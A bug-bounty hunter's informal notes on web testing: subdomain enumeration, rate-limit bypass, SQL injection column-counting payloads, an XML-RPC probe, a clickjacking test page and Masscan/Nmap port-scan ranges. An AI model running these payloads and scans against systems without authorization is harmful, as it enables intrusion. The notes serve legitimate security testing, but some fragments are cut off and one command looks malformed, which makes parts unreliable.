These are just some notes about "WEB" bug bounty. I use to write down stuff which I either learned by trying or by reading other people tweets/blogs. So technically I am not claiming to be the original author of these tips/tricks. I wrote down whatever seemed good to me.
Also I want to point out that I don't do web related bounties any more so it's possible I might have written down something wrong.
assetfinder --subs-only [mocospace.com](http://mocospace.com/) | httprobe > hosts
meg --savestatus 200 /
cat out/index | cut -d' ' -f2
For deciding subdomains you can try to search on wolfram alpha
Rate limit testing
- First just capture in burp and see if you can repeat it.
- Try to add
- Try to add the
%00at the end of the username of email whatever it is sending back for verification.
For removing all the noise in Burp
The best way is to find the number of column required in SQL injection is
' order by 1--
And just like this increase the number until we get the error
Another way is:
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL--
Remember that once using the
NULL use it with the spaces and not with the
+ in between
If you find any XMLRPC then try to send the following payload
POST /xmlrpc.php HTTP/1.1 Host: Some Host User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 131 <?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
For refrence and further testing checkout the following report: https://hackerone.com/reports/752073
Host header injection
I think the best thing to use host header injection in general position would be to show internal information leakage
git clone https://github.com/wikimedia/mediawiki.git cd mediawiki/ ls -d -1 "./"**/* | sed '^\./' > mediawiki-wordlist
<html> <head> <title>Clickjack test page</title> </head> <body> <p>Website is vulnerable to clickjacking!</p> <iframe src="<vulnerable-URL>" width="1000" height="1000"></iframe> </body> </html>
- Best approach is
- First run a 2 or 3 concurrent Masscan jobs with all 65535 ports split into 4-5 ranges.
- Get a list of hosts and and a combined list of open ports from Masscan’s output.
- Use these list as input to Nmap and do a regular Nmap scan.
1-13107 13108-26214 26215-39321 39322-52428 52429-65535
This is the range we should use.